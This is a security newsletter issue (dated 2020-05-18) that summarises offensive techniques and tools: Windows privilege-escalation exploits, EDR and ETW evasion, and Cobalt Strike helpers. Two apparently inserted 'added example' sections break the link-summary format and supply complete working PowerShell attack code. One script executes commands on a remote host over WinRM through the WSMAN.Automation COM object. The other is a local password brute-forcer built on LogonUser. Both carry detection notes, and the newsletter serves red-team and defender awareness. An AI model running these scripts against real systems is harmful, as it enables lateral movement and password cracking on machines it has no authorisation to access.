Last Week in Security (LWiS) - 2020-05-18
A COM-based lateral movement technique from @bohops, a new Potato-style Windows LPE variant from @splinter_code, a local Windows brute forcer from @DarkCoderSc, and more!
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-05-11 to 2020-05-18. MITRE ATT&CK techniques are in brackets where appropriate.
News
- Zoom Acquires Keybase and Announces Goal of Developing the Most Broadly Used Enterprise End-to-End Encryption Offering. Good news for Zoom, probably bad news for keybase users.
- Zerodium Drops Payouts For iOS/Safari Exploits. It looks like there are lots of people finding iOS exploits, perhaps due to the recent iOS 14 leak.
Techniques
- $20,000 Facebook DOM XSS uses postMessage to send a payload containing a javascript: URL to Facebook's login button endpoint, which ends up executing that JavaScript in the facebook.com origin. In the demo this is used to steal the user's cookies (account takeover).
- Flash Player & Background updates from an internal server via mms.cfg provides a potential persistence mechanism for Windows computers running Flash (RIP).
- WS-Management COM: Another Approach for WinRM Lateral Movement uses the WSMAN.Automation COM object to drive WinRM directly, with PoCs in C#, C++, VBScript, JScript, and PowerShell. Code here.
- Using SharePoint as a Phishing Platform from nccgroup shows how SharePoint (normally a trusted domain) can be used to create phishing pages for credential harvesting.
- Hacking Reolink cameras for fun and profit is a very well written and complete writeup of the process of hacking and improving an IP camera. Even if you aren't interested in embedded devices, this post is written so well you will enjoy the journey.
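As an added example of the WSMAN.Automation approach above (this is not code from the post or from @bohops' PoCs), the PowerShell below opens a WS-Man session straight to the target's WinRM listener and calls the WMI Win32_Process Create method through it. The target name, command line and credential are assumed placeholders; it needs TCP 5985 reachable and administrative rights on the target.

```powershell
# Added example, not the post's or bohops' code. Target, command and credential are
# assumed placeholders. Requires WinRM (TCP 5985) reachable and admin rights on the target.
$Target     = 'WIN-TARGET'                                    # assumed hostname
$Command    = 'cmd.exe /c whoami > C:\Windows\Temp\wsman.txt'  # assumed command line
$Credential = $null   # or: Get-Credential 'LAB\admin' for explicit username/password auth

$wsman   = New-Object -ComObject 'WSMAN.Automation'
$options = $wsman.CreateConnectionOptions()
$flags   = 0   # 0 = authenticate with the caller's current token (Negotiate/Kerberos)
if ($Credential) {
    $options.UserName = $Credential.UserName
    $options.Password = $Credential.GetNetworkCredential().Password
    $flags = $wsman.SessionFlagCredUsernamePassword()
}

# The session talks to the WinRM listener directly; no PowerShell remoting endpoint is involved.
$session = $wsman.CreateSession("http://${Target}:5985/wsman", $flags, $options)

# WS-Man resource URI of the WMI Win32_Process class; its Create method takes a CommandLine parameter.
$resourceUri = 'http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process'
$escaped  = [System.Security.SecurityElement]::Escape($Command)
$inputXml = "<p:Create_INPUT xmlns:p=`"$resourceUri`"><p:CommandLine>$escaped</p:CommandLine></p:Create_INPUT>"

# Invoke(actionUri, resourceUri, parameters) returns the Create_OUTPUT document as an XML string.
[xml]$response = $session.Invoke('Create', $resourceUri, $inputXml)
$returnValue = [int]$response.Create_OUTPUT.ReturnValue
if ($returnValue -ne 0) {
    throw "Win32_Process.Create on $Target failed with ReturnValue $returnValue"
}
"Started PID $($response.Create_OUTPUT.ProcessId) on $Target"
```

Because this is a WMI call carried over WinRM rather than a PowerShell remoting session, the source host leaves no Enter-PSSession or Invoke-Command artifacts; on the target, look for the inbound 5985/5986 connection, entries in the Microsoft-Windows-WinRM/Operational log, and the Security 4688 event for the process that Win32_Process.Create spawns.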
Tools and Exploits
- Security Flaws in Adobe Acrobat Reader Allow Malicious Program to Gain Root on macOS Silently. Another XPC logic flaw leads to local privilege escalation on macOS. Expect more of these in the near future as this technique is spreading among researchers. [T1068 Exploitation for Privilege Escalation]
- Windows Local Privilege Escalation (at what point will this need its own section?) [T1068 Exploitation for Privilege Escalation]
- PrintDemon: Print Spooler Privilege Escalation, Persistence & Stealth (CVE-2020-1048 & more). Legacy Windows features such as the Print Spooler are the gift that keeps on giving. Code here.
- Invoke-PrintDemon is a PowerShell Empire launcher PoC built on PrintDemon and Faxhell. The module embeds the Faxhell DLL, which leverages CVE-2020-1048 for privilege escalation.
- No more JuicyPotato? Old story, welcome RoguePotato! The latest in the resilient "potato" line of exploits takes inspiration from PrintSpoofer (LWiS-2020-05-04). Microsoft considers elevation from a Local Service account holding SeImpersonatePrivilege to SYSTEM expected behavior, so this will not be fixed! Code here.
- dalfox is a parameter analysis and XSS scanning tool written in Go. Use it to find your own 20k bounty!
- hellscape is a GIMPLE obfuscator for C, C++, Go, ... in fact for every GCC target and front-end that lowers to GIMPLE. [T1066 Indicator Removal from Tools]
- win-brute-logon - crack any Microsoft Windows user's password without any privilege (Guest account included). Because a standalone Windows install ships with no account lockout threshold (net accounts reports "Lockout threshold: Never"), local password guessing runs at high speed without ever locking the target account, even from Guest.
- Stormspotter is an Azure Red Team tool for graphing Azure and Azure Active Directory objects. Bloodhound for the cloud.
- CarbonMonoxide EDR Evasion - a combination of SwampThing and TikiTorch.
- SharpRDPCheck checks credentials or NTLM hashes against Remote Desktop Protocol (RDP) endpoints.
- BlockEtw is an injectable .NET 3.5/4 assembly that blocks ETW telemetry in a process. Self-inject it from Cobalt Strike to stop the beacon process emitting ETW telemetry.
- SharpeningCobaltStrike - a real-time .NET v3.5/4.0 compiler for your Linux Cobalt Strike C2. It generates freshly compiled and obfuscated binaries on each use.
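As an added example of the win-brute-logon observation above (this is my own illustration, not the tool's code, and I assume rather than know that the tool uses LogonUser internally), the PowerShell below first reads the local lockout threshold from net accounts, then guesses a small constructed wordlist against a local account with LogonUser, which an unprivileged session may call, and reports the Win32 error of each failure so the caller notices lockout, a disabled account, or a blank-password restriction. The account name and wordlist are assumed placeholders.

```powershell
# Added example, not the post's or win-brute-logon's code. Account name and wordlist are
# constructed placeholders. LogonUser with a network logon type needs no special privilege.
Add-Type -Namespace Win32 -Name Logon -MemberDefinition @'
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool LogonUser(string user, string domain, string password,
                                    int logonType, int logonProvider, out IntPtr token);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr handle);
'@

function Get-LocalLockoutThreshold {
    # 'net accounts' prints "Lockout threshold: Never" when the threshold is 0, the default
    # on a standalone install; any number means failed logons will eventually lock the account.
    foreach ($line in (net accounts 2>$null)) {
        if ($line -match '^Lockout threshold:\s+(\S+)') {
            if ($Matches[1] -eq 'Never') { return 0 }
            return [int]$Matches[1]
        }
    }
    return $null
}

function Test-LocalPassword {
    param([string]$User, [string]$Password, [string]$Domain = '.')
    $token = [IntPtr]::Zero
    # LOGON32_LOGON_NETWORK (3) is the cheapest logon type and what an SMB logon looks like;
    # LOGON32_PROVIDER_DEFAULT (0). Each attempt still produces a Security 4625 on failure.
    $ok  = [Win32.Logon]::LogonUser($User, $Domain, $Password, 3, 0, [ref]$token)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    if ($ok) { [void][Win32.Logon]::CloseHandle($token) }
    [pscustomobject]@{ Password = $Password; Success = $ok; Win32Error = $err }
}

function Invoke-LocalGuess {
    param([string]$User, [string[]]$Wordlist)
    foreach ($candidate in $Wordlist) {
        $r = Test-LocalPassword -User $User -Password $candidate
        if ($r.Success) { return $r }
        switch ($r.Win32Error) {
            1326 { continue }   # ERROR_LOGON_FAILURE: wrong password, keep going
            1327 { Write-Warning "$User has a blank password but network logon of blank passwords is restricted (1327)."; return $r }
            1331 { Write-Warning "$User is disabled (ERROR_ACCOUNT_DISABLED)."; return $r }
            1909 { Write-Warning "$User is now locked out (ERROR_ACCOUNT_LOCKED_OUT); stop guessing."; return $r }
            default { Write-Warning "Unexpected Win32 error $($r.Win32Error) for $User"; return $r }
        }
    }
    return $null
}

# --- demo with constructed inputs ---
$threshold = Get-LocalLockoutThreshold
if ($threshold -eq 0) {
    Write-Host 'Lockout threshold is Never: local guessing is unthrottled.'
    Write-Host 'Local mitigation: net accounts /lockoutthreshold:10 /lockoutduration:15 /lockoutwindow:15'
} else {
    Write-Host "Lockout threshold is $threshold; expect error 1909 after that many failures."
}

$user     = 'labuser'                                    # assumed local account
$wordlist = 'Winter2020!', 'Password1', 'Spring2020!'    # constructed wordlist
$hit = Invoke-LocalGuess -User $user -Wordlist $wordlist
if ($hit -and $hit.Success) { "Valid password for ${user}: $($hit.Password)" } else { 'No hit.' }
```

On a domain member the threshold comes from the domain's account lockout policy rather than net accounts, and the local Guest account is disabled by default, which is why the disabled-account branch is worth keeping; the 4625 events from each failed LogonUser call are the detection opportunity a lockout policy would otherwise provide.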
Utilities
- vscode-drawio brings the great open source diagramming tool into VSCode.
- yubikey-agent simplifies the arduous YubiKey setup process to a single command. Because the key is generated on the YubiKey and never leaves it, this setup creates no encrypted backup, so a lost or broken YubiKey cannot be restored.
- lens is a cross-platform IDE for managing Kubernetes clusters. Nothing extra needs to be installed in the cluster; just run the app and start managing.
This post is cross-posted on SIXGEN's blog.